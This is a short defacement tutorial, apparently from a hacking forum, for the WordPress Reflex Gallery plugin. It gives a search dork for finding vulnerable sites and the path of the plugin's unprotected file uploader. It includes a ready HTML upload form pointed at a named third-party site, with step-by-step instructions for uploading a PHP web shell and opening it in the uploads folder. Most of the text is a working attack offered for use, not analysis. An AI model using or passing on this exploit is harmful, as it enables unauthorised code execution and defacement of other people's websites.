[DEFACE] How To Deface with WordPress Reflex Gallery

——————————————————————–
– Dork : inurl:/wp-content/plugins/reflex-gallery/
– Exploit : wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
– Vuln : {“error”:”No files were uploaded.”}
– My Site Vuln : http://sjoyster.com/
– Script CSRF :
<html>
<title>Reflex-Gallery CSRF</title>
<form method=”POST” action=”http://straightlineinspection.com/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php” enctype=”multipart/form-data” >

<input type=”file” name=”qqfile”><br>

<input type=”submit” name=”Submit” value=”Pwn!”>

</form>
</html>
———————————————————————-

Okay Lets Go to Tutorial

– Save script CSRF [ reflex.html ] – Change The Site , to site Vuln
– Save
– Chek The Vuln
– Oh yeah , that vuln 😀
– Open The Script in the Browser
– Upload your shell
– bcc.php is my shell 🙂
– Click ” Pwn!”
– Succses 😀
– Open your Shell in the :
[ site.com/wp-content/uploads/shell.php